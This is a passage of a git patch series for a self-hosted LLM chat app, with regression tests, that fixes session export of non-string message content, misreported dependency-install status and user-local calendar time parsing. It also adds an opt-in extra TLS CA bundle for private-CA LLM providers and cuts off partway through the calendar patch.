From 28c43121d70779ebe1e77c4f9e5fb9e8e2feef80 Mon Sep 17 00:00:00 2001
From: ghreprimand <github@jrpmail.ca>
Date: Thu, 4 Jun 2026 06:53:44 -0500
Subject: [PATCH 01/12] Fix session export 500 on multimodal/None message
 content (#1984)

txt/html/md export joined and string-munged message.content directly, so a
multimodal turn (content is a list of blocks) crashed export with a TypeError
on join (txt) / AttributeError on .replace (html), and None content (tool-only
assistant turns) rendered as the literal 'None'. Add a _content_to_text helper
that flattens string/list/None to plain text and apply it at the three export
sites. JSON export is unchanged (it serializes structured content correctly).
Plain-string content is returned unchanged, so existing exports are identical.

Co-authored-by: ghreprimand <203024559+ghreprimand@users.noreply.github.com>
---
 routes/session_routes.py                      | 26 ++++++++--
 .../test_session_export_nonstring_content.py  | 50 +++++++++++++++++++
 2 files changed, 73 insertions(+), 3 deletions(-)
 create mode 100644 tests/test_session_export_nonstring_content.py
diff --git a/routes/session_routes.py b/routes/session_routes.py
index 1b38e4b..58cb8ae 100644
--- a/routes/session_routes.py
+++ b/routes/session_routes.py
@@ -37,6 +37,26 @@ def _public_model(name: str, model: str) -> str:
     return model
 
 
+def _content_to_text(content) -> str:
+    """Flatten a message's content to plain text for text-based exports.
+
+    History entries carry three shapes: a plain string, a multimodal list of
+    content blocks (vision/image attachments), or None (assistant turns that
+    persisted only native tool_calls). The txt/html/md exporters join and
+    string-munge this value, so a list crashed the export (TypeError on join,
+    AttributeError on .replace) and None rendered as the literal "None".
+    Coerce to the text blocks, returning "" for anything without text.
+    """
+    if isinstance(content, str):
+        return content
+    if isinstance(content, list):
+        return "\n".join(
+            b.get("text", "") for b in content
+            if isinstance(b, dict) and b.get("text")
+        )
+    return ""
+
+
 def _verify_session_owner(request: Request, session_id: str, session_manager=None):
     """Verify the current user owns the session. Raises 404 if not.
 
@@ -708,7 +728,7 @@ def setup_session_routes(session_manager: SessionManager, config: dict, webhook_
             lines = []
             for m in session.history:
                 lines.append(f"[{m.role.upper()}]")
-                lines.append(m.content)
+                lines.append(_content_to_text(m.content))
                 lines.append("")
             out_name = filename or f"conversation_{safe_name}_{timestamp}.txt"
             return Response(
@@ -731,7 +751,7 @@ def setup_session_routes(session_manager: SessionManager, config: dict, webhook_
             ]
             for m in session.history:
                 cls = "user" if m.role == "user" else "ai"
-                content = m.content.replace("&", "&amp;").replace("<", "&lt;").replace(">", "&gt;")
+                content = _content_to_text(m.content).replace("&", "&amp;").replace("<", "&lt;").replace(">", "&gt;")
                 content = content.replace("\n", "<br>")
                 html_parts.append(f'<div class="msg {cls}"><div class="role">{m.role}</div>{content}</div>')
             html_parts.append("</body></html>")
@@ -750,7 +770,7 @@ def setup_session_routes(session_manager: SessionManager, config: dict, webhook_
         markdown_lines.append("\n---\n")
         for message in session.history:
             role = message.role.upper()
-            content = message.content
+            content = _content_to_text(message.content)
             markdown_lines.append(f"### {role}")
             markdown_lines.append(f"{content}\n")
             markdown_lines.append("---\n")
diff --git a/tests/test_session_export_nonstring_content.py b/tests/test_session_export_nonstring_content.py
new file mode 100644
index 0000000..07641ed
--- /dev/null
+++ b/tests/test_session_export_nonstring_content.py
@@ -0,0 +1,50 @@
+"""Regression: session export must tolerate non-string message content.
+
+A message's ``content`` is a plain string for normal turns, but a multimodal
+list of content blocks for image/vision turns, and ``None`` for assistant turns
+that persisted only native tool_calls. The txt/html/md exporters in
+``routes/session_routes.py`` joined and string-munged ``content`` directly, so:
+
+  - txt:  ``"\n".join([..., <list>, ...])``      -> TypeError
+  - html: ``<list>.replace("&", "&amp;")``        -> AttributeError
+  - md:   ``f"{<list>}"``                          -> raw Python repr in output
+
+``_content_to_text`` coerces all three shapes to plain text so export degrades
+gracefully instead of returning a 500.
+"""
+from routes.session_routes import _content_to_text
+
+
+def test_plain_string_passes_through_unchanged():
+    assert _content_to_text("hello world") == "hello world"
+    assert _content_to_text("") == ""
+
+
+def test_multimodal_list_flattens_to_its_text_blocks():
+    content = [
+        {"type": "text", "text": "describe this"},
+        {"type": "image_url", "image_url": {"url": "data:image/png;base64,AAAA"}},
+        {"type": "text", "text": "thanks"},
+    ]
+    assert _content_to_text(content) == "describe this\nthanks"
+
+
+def test_none_content_becomes_empty_string():
+    # Assistant turns carrying only native tool_calls persist content as None.
+    assert _content_to_text(None) == ""
+
+
+def test_list_without_text_blocks_is_empty_not_crash():
+    assert _content_to_text([{"type": "image_url", "image_url": {"url": "x"}}]) == ""
+    assert _content_to_text([]) == ""
+
+
+def test_coerced_output_survives_the_export_operations():
+    # The exact operations that previously crashed must now succeed.
+    history = ["plain", [{"type": "text", "text": "img turn"}], None]
+    texts = [_content_to_text(c) for c in history]
+    # txt export path
+    assert "\n".join(texts) == "plain\nimg turn\n"
+    # html export path
+    for t in texts:
+        assert isinstance(t.replace("&", "&amp;"), str)

From f876fc770432ef1a699358a37ba4691a7c558b3b Mon Sep 17 00:00:00 2001
From: SHORYA BAJ <110905262+bajshorya@users.noreply.github.com>
Date: Thu, 4 Jun 2026 17:25:06 +0530
Subject: [PATCH 02/12] fix(cookbook): don't mark successful dependency
 installs as crashed (#1315)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Pip dependency installs are tracked as download tasks but finish with the
runner's "=== Process exited with code 0 ===" sentinel and pip's
"Successfully installed" line — never the HuggingFace download markers
(DONE / 100% / /snapshots/ / DOWNLOAD_OK) the download heuristics look for.

Once the tmux pane is gone, the backend's only completion check is the HF
cache lookup, which a pip package (e.g. llama-cpp-python[server], no "/")
never matches, so it reports "stopped" — and the frontend maps a stopped
download to "crashed". The reconnect loop's session-gone heuristic had the
same gap. Result: a clean install (exit 0) showed "crashed" in the Running
tab while the Dependencies tab correctly showed it installed.

Add a shared _depInstallSucceeded() helper that keys off the exit-0
sentinel (falling back to pip's success line, rejecting ERROR/Traceback)
and wire it into both the session-gone heuristic and the background status
reconciler, gated on payload._dep so real model downloads are unaffected.

Also fixes the pre-existing test_background_status_poll_reconciles_into_local_tasks
assertion that no longer matched the evolved reconciler, and adds regression
coverage for both paths.
---
 static/js/cookbookRunning.js                  | 31 ++++++++++++++--
 ...okbook_dependency_completion_regression.py | 36 +++++++++++++++++++
 2 files changed, 65 insertions(+), 2 deletions(-)

diff --git a/static/js/cookbookRunning.js b/static/js/cookbookRunning.js
index 5f75a49..1f225b7 100644
--- a/static/js/cookbookRunning.js
+++ b/static/js/cookbookRunning.js
@@ -66,6 +66,23 @@ function _clearPillLabel(task) {
   return 'clear';
 }
 
+// A pip dependency/driver install (payload._dep) reports success with the
+// runner's "=== Process exited with code 0 ===" sentinel and pip's
+// "Successfully installed" line — never the HuggingFace download markers
+// (DONE / 100% / /snapshots/ / DOWNLOAD_OK) that the download heuristics look
+// for. Without this, a clean install whose tmux pane has already gone away is
+// misread as crashed/stopped even though pip exited 0. Prefer the authoritative
+// exit-code sentinel; fall back to pip's success line when no sentinel was
+// captured (and there's no install error in the same output).
+function _depInstallSucceeded(output) {
+  const text = String(output || '');
+  if (!text) return false;
+  const exitMatch = text.match(/=== Process exited with code (-?\d+) ===/);
+  if (exitMatch) return Number(exitMatch[1]) === 0;
+  return /\b(?:Successfully installed|Requirement already satisfied)\b/.test(text)
+    && !/\bERROR\b|No matching distribution|Could not find a version|Traceback \(most recent call last\)/.test(text);
+}
+
 function _shouldOfferCrashReport(task) {
   if (!task) return false;
   if (task._unreachable && task.type === 'serve') return true;
@@ -2448,7 +2465,10 @@ async function _reconnectTask(el, task) {
           const downloadLooksSuccessful = !lastOutput.includes('DOWNLOAD_FAILED')
             && (lastOutput.includes('DONE') || lastOutput.includes('100%') || lastOutput.includes('/snapshots/') || lastOutput.includes('Download complete') || lastOutput.includes('DOWNLOAD_OK'));
           const serveLooksReady = task.type === 'serve' && _serveOutputLooksReady({ ...task, output: lastOutput });
-          const looksSuccessful = task.type === 'download' ? downloadLooksSuccessful : serveLooksReady;
+          // Dependency installs are tracked as download tasks but finish with a
+          // pip exit-0 sentinel, not HF download markers — so check that too.
+          const depInstallSucceeded = !!task.payload?._dep && _depInstallSucceeded(lastOutput);
+          const looksSuccessful = depInstallSucceeded || (task.type === 'download' ? downloadLooksSuccessful : serveLooksReady);
           if (!lastOutput.trim() || !looksSuccessful) {
             _updateTask(task.sessionId, { status: 'crashed' });
             el.dataset.status = 'crashed';
@@ -3309,11 +3329,18 @@ async function _pollBackgroundStatus() {
         const live = statusById.get(task.sessionId);
         if (!live) continue;
         const updates = {};
+        // A finished dependency install whose tmux pane is gone is reported
+        // "stopped" by the backend (its pip package is never in the HF cache the
+        // dead-session check inspects). Recover "done" from the retained output's
+        // exit-0 sentinel so a clean install isn't downgraded to crashed.
+        const depDone = !!task.payload?._dep && _depInstallSucceeded(task.output);
         const nextStatus = live.status === 'completed'
           ? 'done'
           : (live.status === 'error'
             ? 'error'
-            : (live.status === 'stopped' ? (task.type === 'download' ? 'crashed' : 'stopped') : null));
+            : (live.status === 'stopped'
+                ? (depDone ? 'done' : (task.type === 'download' ? 'crashed' : 'stopped'))
+                : null));
         if (nextStatus && task.status !== nextStatus) {
           updates.status = nextStatus;
           if (nextStatus === 'done' && task.payload?._dep) completedDeps.push(task);
diff --git a/tests/test_cookbook_dependency_completion_regression.py b/tests/test_cookbook_dependency_completion_regression.py
index b47e9b2..4c0ab59 100644
--- a/tests/test_cookbook_dependency_completion_regression.py
+++ b/tests/test_cookbook_dependency_completion_regression.py
@@ -37,6 +37,42 @@ def test_local_windows_session_commands_use_local_powershell_log_dir():
     assert ": `powershell -Command \"${ps}\"`;" in source
 
 
+def test_dep_install_success_recognized_from_exit_sentinel():
+    """A pip dependency install reports success via the runner's exit-0
+    sentinel / pip's "Successfully installed" line, not the HuggingFace
+    download markers. The shared helper must key off those, so an install
+    whose tmux pane is gone isn't misread as crashed."""
+    source = _read("static/js/cookbookRunning.js")
+
+    assert "function _depInstallSucceeded(output) {" in source
+    assert "=== Process exited with code" in source
+    assert "Successfully installed" in source
+
+
+def test_session_gone_heuristic_honors_dep_install_success():
+    """The reconnect loop's session-gone branch (download tasks need an HF
+    marker to look successful) must also accept a finished dependency install,
+    otherwise a clean pip install with no HF markers is marked crashed."""
+    source = _read("static/js/cookbookRunning.js")
+
+    assert "const depInstallSucceeded = !!task.payload?._dep && _depInstallSucceeded(lastOutput);" in source
+    assert (
+        "const looksSuccessful = depInstallSucceeded "
+        "|| (task.type === 'download' ? downloadLooksSuccessful : serveLooksReady);"
+    ) in source
+
+
+def test_background_poll_recovers_done_for_stopped_dependency_install():
+    """When the backend reports a finished dependency install as "stopped"
+    (its pip package is never in the HF cache the dead-session check inspects),
+    the reconciler must recover "done" from the retained output instead of
+    downgrading the card to crashed."""
+    source = _read("static/js/cookbookRunning.js")
+
+    assert "const depDone = !!task.payload?._dep && _depInstallSucceeded(task.output);" in source
+    assert "depDone ? 'done' : (task.type === 'download' ? 'crashed' : 'stopped')" in source
+
+
 def test_dependency_install_payload_keeps_env_path_for_refresh():
     source = _read("static/js/cookbook.js")
 

From f59edee6115b2a806bbe4357806eb14984701ac3 Mon Sep 17 00:00:00 2001
From: tanmayraut45 <tanmayraut0@gmail.com>
Date: Thu, 4 Jun 2026 17:48:50 +0530
Subject: [PATCH 03/12] Support extra CA bundle for private-CA LLM providers
 (#769)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Adding GigaChat (Sber) or an on-premise enterprise LLM gateway as a
model endpoint fails on first probe with

    CERTIFICATE_VERIFY_FAILED: self-signed certificate in certificate
    chain (_ssl.c:1000)

because their TLS chain is signed by a private root CA (Russian Trusted
Root CA for GigaChat; corporate CA for on-prem) that isn't part of the
default system / certifi trust store. The endpoint shows offline in
the picker even though the URL and API key are correct (issue #722).

The right fix is to extend the trust store, not to weaken verification.
This change:

- src/tls_overrides.py: new module that resolves an opt-in env var
  LLM_CA_BUNDLE at import time, builds a shared SSLContext via
  ssl.create_default_context() (so the system / certifi bundle is
  loaded first) and layers the operator's PEM on top with
  load_verify_locations(). Exposes llm_verify() returning a value
  suitable for httpx `verify=`. Defaults to True (httpx built-in
  trust) when the env var is unset, when the file is missing, or
  when the PEM fails to load — verification is never silently
  disabled, the warning is logged and we fall back to the safe path.

- src/llm_core.py: thread llm_verify() into the shared AsyncClient
  used by stream_llm / streaming completions.

- routes/model_routes.py: thread llm_verify() into the five httpx.get
  call sites in _probe_endpoint / _ping_endpoint so adding a
  private-CA endpoint goes green on the very first probe and the
  picker stops showing it offline.

- .env.example: document LLM_CA_BUNDLE with the GigaChat case as the
  concrete example.

Deliberately NOT included: a verify=False knob (global or per-host).
Disabling verification exposes the affected endpoint to MITM, and the
operator-supplied bundle is the correct fix for legitimate private-CA
providers — so the only switch in this PR is the safe one.

Closes #722.
---
 .env.example                      |  10 ++
 routes/model_routes.py            |  11 ++-
 src/llm_core.py                   |   5 +-
 src/tls_overrides.py              |  91 ++++++++++++++++++
 tests/test_tls_overrides_scope.py | 149 ++++++++++++++++++++++++++++++
 5 files changed, 260 insertions(+), 6 deletions(-)
 create mode 100644 src/tls_overrides.py
 create mode 100644 tests/test_tls_overrides_scope.py

diff --git a/.env.example b/.env.example
index e53d2f8..f282880 100644
--- a/.env.example
+++ b/.env.example
@@ -27,6 +27,16 @@ LLM_HOST=localhost
 # Research service LLM endpoint
 # RESEARCH_LLM_ENDPOINT=http://localhost:8000/v1/chat/completions
 
+# Extra CA bundle for LLM providers whose TLS chain isn't in the default
+# trust store. Layered ON TOP of the system / certifi bundle — verification
+# stays on for every host, the trust set just gets larger. Useful for:
+#   - GigaChat / Sber (Russian Trusted Root CA): without this the endpoint
+#     shows offline with CERTIFICATE_VERIFY_FAILED — self-signed certificate
+#     in certificate chain.
+#   - On-premise / corporate LLM gateways with an internal CA.
+# Point at a PEM file containing the missing root(s).
+# LLM_CA_BUNDLE=/etc/odysseus/ca/extra-roots.pem
+
 # ============================================================
 # Search & Web
 # ============================================================
diff --git a/routes/model_routes.py b/routes/model_routes.py
index 0cf98d5..ac025ad 100644
--- a/routes/model_routes.py
+++ b/routes/model_routes.py
@@ -17,6 +17,7 @@ from fastapi.responses import StreamingResponse
 from core.database import SessionLocal, ModelEndpoint, Session as DbSession
 from core.middleware import require_admin
 from src.llm_core import _detect_provider, _host_match, ANTHROPIC_MODELS
+from src.tls_overrides import llm_verify
 from src.settings import load_settings as _load_settings, save_settings as _save_settings
 from src.endpoint_resolver import (
     normalize_base as _normalize_base,
@@ -624,7 +625,7 @@ def _probe_endpoint(base_url: str, api_key: str = None, timeout: int = 5) -> Lis
         if api_key:
             headers["x-api-key"] = api_key
         try:
-            r = httpx.get(url, headers=headers, timeout=timeout)
+            r = httpx.get(url, headers=headers, timeout=timeout, verify=llm_verify())
             r.raise_for_status()
             data = r.json()
             models = [m.get("id") for m in (data.get("data") or []) if m.get("id")]
@@ -645,7 +646,7 @@ def _probe_endpoint(base_url: str, api_key: str = None, timeout: int = 5) -> Lis
     url = build_models_url(base)
     headers = build_headers(api_key, base)
     try:
-        r = httpx.get(url, headers=headers, timeout=timeout)
+        r = httpx.get(url, headers=headers, timeout=timeout, verify=llm_verify())
         r.raise_for_status()
         data = r.json()
         # OpenAI format: {"data": [{"id": "model-name"}]}
@@ -680,7 +681,7 @@ def _probe_endpoint(base_url: str, api_key: str = None, timeout: int = 5) -> Lis
         parsed = urlparse(base)
         if parsed.port == 11434 or "ollama" in (parsed.hostname or "").lower():
             root = base[:-3].rstrip("/") if base.endswith("/v1") else base
-            r = httpx.get(root + "/api/tags", timeout=timeout)
+            r = httpx.get(root + "/api/tags", timeout=timeout, verify=llm_verify())
             r.raise_for_status()
             data = r.json()
             models = [m.get("name") or m.get("model") for m in (data.get("models") or []) if m.get("name") or m.get("model")]
@@ -741,7 +742,7 @@ def _ping_endpoint(base_url: str, api_key: str = None, timeout: float = 1.5) ->
                     break
             for path in ("/api/version", "/api/tags"):
                 try:
-                    r = httpx.get(root + path, timeout=timeout)
+                    r = httpx.get(root + path, timeout=timeout, verify=llm_verify())
                     result = _result_from_response(r)
                     if result["reachable"]:
                         return result
@@ -752,7 +753,7 @@ def _ping_endpoint(base_url: str, api_key: str = None, timeout: float = 1.5) ->
         pass
 
     try:
-        r = httpx.get(base, headers=headers, timeout=timeout)
+        r = httpx.get(base, headers=headers, timeout=timeout, verify=llm_verify())
         return _result_from_response(r)
     except Exception as e:
         last_error = str(e)[:120]
diff --git a/src/llm_core.py b/src/llm_core.py
index 2d66685..be31ac5 100644
--- a/src/llm_core.py
+++ b/src/llm_core.py
@@ -129,7 +129,10 @@ def _get_http_client() -> httpx.AsyncClient:
     """Return process-wide AsyncClient. Per-request timeout is passed at call time."""
     global _http_client
     if _http_client is None or _http_client.is_closed:
-        _http_client = httpx.AsyncClient(limits=_http_limits, http2=False)
+        from src.tls_overrides import llm_verify
+        _http_client = httpx.AsyncClient(
+            limits=_http_limits, http2=False, verify=llm_verify(),
+        )
     return _http_client
 
 def _get_cached_response(cache_key: str) -> Optional[str]:
diff --git a/src/tls_overrides.py b/src/tls_overrides.py
new file mode 100644
index 0000000..dc4e460
--- /dev/null
+++ b/src/tls_overrides.py
@@ -0,0 +1,91 @@
+"""Extended TLS trust store for private-CA LLM providers.
+
+Some upstream LLM providers serve their API over TLS certificates that are
+signed by a private root CA which is not part of the standard system bundle:
+
+  - GigaChat (Sber) uses the Russian Trusted Root CA, not bundled with
+    OpenSSL / certifi / system trust on most non-Russian installs. The
+    chain looks self-signed to Python and the endpoint is marked offline
+    with `CERTIFICATE_VERIFY_FAILED: self-signed certificate in
+    certificate chain` (see issue #722).
+  - On-premise enterprise LLM gateways often present a corporate CA that
+    has not been imported into the runtime's trust store.
+
+Operators point `LLM_CA_BUNDLE` at a PEM file containing the extra CA
+cert(s). The default system / certifi trust store is loaded first, then
+the operator's PEM is layered on top, so verification still happens —
+the trust set just gets larger. We deliberately do not provide a
+"verify=off" knob: weakening verification globally (or per-host) would
+expose those endpoints to MITM, and the operator-supplied bundle is the
+correct fix for legitimate private-CA providers.
+
+Example (GigaChat):
+    # Sber publishes the chain at
+    # https://www.gosuslugi.ru/crt/rootca_ssl_rsa2022.cer
+    # Convert to PEM and point the env var at it.
+    LLM_CA_BUNDLE=/etc/odysseus/ca/russian-trusted-root.pem
+
+Scope:
+    `llm_verify()` is intentionally consumed by only two call sites — the
+    shared async client in `src/llm_core.py` and the endpoint probes in
+    `routes/model_routes.py`. Both reach LLM provider URLs. The override
+    is NOT threaded into web_fetch, search providers, gallery downloads,
+    embeddings, webhook delivery, or anything else that hits arbitrary
+    URLs, and it does NOT affect the app's own browser-facing TLS. That
+    boundary is pinned by `tests/test_tls_overrides_scope.py` — extending
+    it requires updating the allowlist there with a written justification.
+"""
+
+import logging
+import os
+import ssl
+from typing import Optional
+
+logger = logging.getLogger(__name__)
+
+
+_extra_bundle_path: Optional[str] = (os.environ.get("LLM_CA_BUNDLE") or "").strip() or None
+
+
+def _build_ssl_context() -> Optional[ssl.SSLContext]:
+    """Build an SSLContext that uses the default trust store and ALSO trusts
+    the operator-supplied PEM bundle. Returns None when no extra bundle is
+    configured, so callers fall through to httpx's default verify=True."""
+    if not _extra_bundle_path:
+        return None
+    if not os.path.isfile(_extra_bundle_path):
+        logger.warning(
+            "LLM_CA_BUNDLE points at %r but the file does not exist; "
+            "falling back to the default trust store.",
+            _extra_bundle_path,
+        )
+        return None
+    ctx = ssl.create_default_context()
+    try:
+        ctx.load_verify_locations(cafile=_extra_bundle_path)
+    except (ssl.SSLError, OSError) as e:
+        logger.warning(
+            "LLM_CA_BUNDLE=%r failed to load (%s); falling back to the "
+            "default trust store.",
+            _extra_bundle_path, e,
+        )
+        return None
+    logger.info(
+        "Loaded extra CA bundle %r on top of the default trust store.",
+        _extra_bundle_path,
+    )
+    return ctx
+
+
+# Resolved once at import time. The httpx clients in src/llm_core.py are
+# long-lived (process-wide), so editing LLM_CA_BUNDLE requires a restart —
+# matching the existing semantics of LLM_HOST, SEARXNG_INSTANCE, etc.
+_SHARED_SSL_CONTEXT: Optional[ssl.SSLContext] = _build_ssl_context()
+
+
+def llm_verify():
+    """Return the value to pass as `verify=` on httpx.get / httpx.Client /
+    httpx.AsyncClient. Returns the extended-trust SSLContext when
+    LLM_CA_BUNDLE is set and loaded; otherwise True (httpx default — system
+    / certifi bundle, verification fully on)."""
+    return _SHARED_SSL_CONTEXT if _SHARED_SSL_CONTEXT is not None else True
diff --git a/tests/test_tls_overrides_scope.py b/tests/test_tls_overrides_scope.py
new file mode 100644
index 0000000..e2ff114
--- /dev/null
+++ b/tests/test_tls_overrides_scope.py
@@ -0,0 +1,149 @@
+"""Scope tests for src/tls_overrides.
+
+#722 / PR #769 added an opt-in extra CA bundle (LLM_CA_BUNDLE) for
+private-CA LLM providers. The whole point is that the override stays
+SCOPED — it must extend trust for the intended outbound LLM provider
+requests only, and never:
+
+  - touch arbitrary URL fetching (web_fetch, document downloads, generic
+    httpx.get from any other module),
+  - touch browser-facing TLS (anything our app serves over HTTPS),
+  - weaken httpx's process-wide defaults,
+  - silently disable certificate verification.
+
+These tests prove that. They enumerate the call sites of `llm_verify()`
+in the source tree and assert they match an allowlist; they verify the
+override module itself never reaches for the well-known "skip TLS
+verification" knobs; and they pin the safe default (verify=True) when
+LLM_CA_BUNDLE is unset.
+
+If a future change threads `llm_verify()` into a non-LLM HTTP path, the
+first test fails and the contributor either has to justify the new
+caller (and add it to ALLOWED_CALLERS with a comment) or revert. That
+keeps the security-sensitive helper hard to misuse.
+"""
+
+from __future__ import annotations
+
+import os
+import re
+from pathlib import Path
+
+REPO = Path(__file__).resolve().parents[1]
+
+
+# Files that legitimately need llm_verify() applied to their outbound
+# httpx calls because the URL is an LLM provider's API. Every caller here
+# is a discrete LLM HTTP entry point and intentional. Any addition must
+# come with its own justification in code review.
+ALLOWED_CALLERS = frozenset({
+    "src/llm_core.py",          # shared AsyncClient used by stream_llm
+    "routes/model_routes.py",   # _probe_endpoint + _ping_endpoint
+})
+
+
+def _grep_files(pattern: str) -> set[str]:
+    """Return the set of repo-relative .py file paths whose body matches
+    `pattern`. Skips tests, the override module itself, and worktree
+    scratch dirs."""
+    rx = re.compile(pattern)
+    hits: set[str] = set()
+    for path in REPO.rglob("*.py"):
+        rel = path.relative_to(REPO).as_posix()
+        if rel.startswith("tests/"):
+            continue
+        if rel == "src/tls_overrides.py":  # definition site, not a caller
+            continue
+        if rel.startswith(".claude/") or "/.claude/" in rel:
+            continue
+        try:
+            body = path.read_text(encoding="utf-8", errors="ignore")
+        except OSError:
+            continue
+        if rx.search(body):
+            hits.add(rel)
+    return hits
+
+
+def test_llm_verify_only_used_in_allowlisted_files():
+    """llm_verify() must only be consumed by the LLM provider HTTP path.
+
+    The extra CA bundle is scoped to the two known LLM HTTP entry points.
+    If a future PR threads llm_verify() into web_fetch, search providers,
+    embeddings, gallery downloads, webhook delivery, or any other
+    arbitrary-URL caller, that's a scope expansion and a security review.
+    Adding a file to ALLOWED_CALLERS requires a written justification.
+    """
+    callers = _grep_files(r"\bllm_verify\s*\(")
+    unexpected = callers - ALLOWED_CALLERS
+    missing = ALLOWED_CALLERS - callers
+    assert not unexpected, (
+        f"llm_verify() called from unexpected file(s): {sorted(unexpected)}. "
+        f"Expected scope: {sorted(ALLOWED_CALLERS)}. If the new caller is an "
+        "LLM provider HTTP entry point, add it to ALLOWED_CALLERS with a "
+        "comment; if it's not, do not thread the extra CA bundle into it."
+    )
+    assert not missing, (
+        f"llm_verify() no longer called from {sorted(missing)} — the "
+        "extra CA bundle integration regressed or the allowlist is stale."
+    )
+
+
+def test_tls_overrides_does_not_weaken_global_tls():
+    """src/tls_overrides must never reach for a TLS-weakening knob.
+
+    Several common ways to silently weaken TLS in Python:
+      - ssl._create_default_https_context = ssl._create_unverified_context
+      - ssl._create_unverified_context (used as a default)
+      - urllib3.disable_warnings(...)
+      - httpx.AsyncClient(verify=False) (anywhere — must stay verify=True
+        or an SSLContext)
+      - requests.packages.urllib3.disable_warnings(...)
+
+    The override module must only EXTEND trust by loading an additional
+    bundle into an ssl.SSLContext built on top of the system default. It
+    must never silently disable verification.
+    """
+    body = (REPO / "src" / "tls_overrides.py").read_text(encoding="utf-8")
+    forbidden = [
+        r"_create_default_https_context\s*=",
+        r"_create_unverified_context",
+        r"disable_warnings",
+        r"verify\s*=\s*False",
+    ]
+    for pat in forbidden:
+        assert not re.search(pat, body), (
+            f"src/tls_overrides.py contains forbidden pattern {pat!r}. "
+            "The extra CA bundle must only ADD trust, never weaken it."
+        )
+
+
+def test_llm_verify_default_is_true_when_env_unset():
+    """When LLM_CA_BUNDLE is unset, llm_verify() must return True so httpx
+    falls through to its built-in trust store. This is the safe default —
+    operators have to opt in to get any change at all."""
+    os.environ.pop("LLM_CA_BUNDLE", None)
+    import importlib
+
+    import src.tls_overrides as mod
+    importlib.reload(mod)
+    assert mod.llm_verify() is True, (
+        f"Default llm_verify() must be True (httpx built-in trust store); "
+        f"got {mod.llm_verify()!r}. An accidental non-True default would "
+        "turn an opt-in extension into a process-wide change."
+    )
+
+
+def test_llm_verify_falls_back_to_true_for_missing_bundle_file():
+    """Pointing LLM_CA_BUNDLE at a non-existent path must NOT raise and
+    must fall back to verify=True (system trust). A misconfigured env var
+    on a deploy box should never produce a silently TLS-disabled process."""
+    os.environ["LLM_CA_BUNDLE"] = "/nonexistent/path/extra-roots.pem"
+    try:
+        import importlib
+
+        import src.tls_overrides as mod
+        importlib.reload(mod)
+        assert mod.llm_verify() is True
+    finally:
+        os.environ.pop("LLM_CA_BUNDLE", None)

From 7b45a94b6d8469bafca10e655f56f10695301ce4 Mon Sep 17 00:00:00 2001
From: Alexander Kenley <alexanderkenley@gmail.com>
Date: Thu, 4 Jun 2026 22:20:04 +1000
Subject: [PATCH 04/12] Fix calendar routing and user-local time context (#408)

* fix(chat): add user-local time context

* fix(chat): route calendar follow-up phrasing

* refactor(chat): log tool intent routing reasons

* test(chat): align user time prompt shim

---------

Co-authored-by: Alex Kenley <Alex.Kenley@threatvectorsecurity.com>
---
 routes/calendar_routes.py    |  62 +++++++++-------
 routes/chat_routes.py        |  44 +++++++----
 src/action_intents.py        | 119 +++++++++++++++++++++---------
 src/agent_loop.py            |  25 +------
 src/chat_processor.py        |   9 +++
 src/tool_index.py            |   2 +-
 src/tool_schemas.py          |   2 +-
 src/user_time.py             | 138 +++++++++++++++++++++++++++++++++++
 static/js/calendar.js        |   3 +-
 static/js/chat.js            |  31 ++++++--
 tests/test_action_intents.py |  23 +++++-
 tests/test_user_time.py      | 111 ++++++++++++++++++++++++++++
 12 files changed, 463 insertions(+), 106 deletions(-)
 create mode 100644 src/user_time.py
 create mode 100644 tests/test_user_time.py

diff --git a/routes/calendar_routes.py b/routes/calendar_routes.py
index 4c79ce8..788a6ea 100644
--- a/routes/calendar_routes.py
+++ b/routes/calendar_routes.py
@@ -161,26 +161,18 @@ def _ensure_default_calendar(db, owner: str = None) -> CalendarCal:
     return cal
 
 
-# Per-request user UTC offset (in minutes east of UTC). chat_routes sets this
-# from the `X-Tz-Offset` header so naive natural-language times the LLM
-# emits ("today at 9pm") are parsed in the USER's timezone, not the server's
-# clock.  None = unknown, fall back to legacy server-local behavior.
-from contextvars import ContextVar
-_USER_TZ_OFFSET_MIN: ContextVar = ContextVar("user_tz_offset_min", default=None)
-
-
-def set_user_tz_offset(offset_min):
-    """Set the current user's UTC offset for this async context."""
-    try:
-        v = int(offset_min)
-    except (TypeError, ValueError):
-        return
-    _USER_TZ_OFFSET_MIN.set(v)
-
-
-def get_user_tz_offset():
-    """Read the current user's UTC offset (minutes east of UTC), or None."""
-    return _USER_TZ_OFFSET_MIN.get()
+# Per-request user time context. chat_routes sets this from browser timezone
+# headers so natural-language times the LLM emits ("today at 9pm") are parsed
+# in the user's timezone, not the server's clock. None = unknown, fall back to
+# legacy server-local behavior.
+from src.user_time import (
+    get_user_tz_name,
+    get_user_tz_offset,
+    now_user_local,
+    set_user_tz_name,
+    set_user_tz_offset,
+    user_timezone,
+)
 
 
 def parse_due_for_user(s: str) -> str:
@@ -199,6 +191,7 @@ def parse_due_for_user(s: str) -> str:
     """
     from datetime import timezone as _tz, timedelta as _td
     offset = get_user_tz_offset()
+    tz_name = get_user_tz_name()
     s = (s or "").strip()
     if not s:
         return s
@@ -212,11 +205,11 @@ def parse_due_for_user(s: str) -> str:
     except ValueError:
         parsed = None
 
-    if offset is None:
+    if offset is None and not tz_name:
         # No user tz known — preserve legacy behavior (naive server-local).
         return _parse_dt(s).isoformat()
 
-    user_tz = _tz(_td(minutes=offset))
+    user_tz = user_timezone()
 
     # Naive ISO → tag with user tz.
     if parsed is not None and parsed.tzinfo is None:
@@ -224,7 +217,7 @@ def parse_due_for_user(s: str) -> str:
 
     # Natural language — evaluate against user's "now".
     server_now_utc = datetime.now(_tz.utc)
-    user_now = server_now_utc.astimezone(user_tz)
+    user_now = now_user_local(server_now_utc)
     # Patch datetime.now() inside _parse_dt by leveraging the user's clock:
     # we re-implement the small natural-language phrases here against user_now
     # so the result is naturally in the user's tz.
@@ -232,6 +225,7 @@ def parse_due_for_user(s: str) -> str:
     lower = s.lower().strip()
 
     def _parse_time(t):
+        t = _re.sub(r'\b([ap])\s*\.?\s*m\.?\b', r'\1m', t.strip(), flags=_re.IGNORECASE)
         m = _re.match(r'^\s*(\d{1,2})(?::(\d{2}))?\s*(am|pm)?\s*$', t, _re.IGNORECASE)
         if not m: return None
         h = int(m.group(1)); mn = int(m.group(2) or 0); ampm = (m.group(3) or "").lower()
@@ -341,6 +335,7 @@ def _parse_dt(s: str) -> datetime:
 
     def _parse_time(t: str):
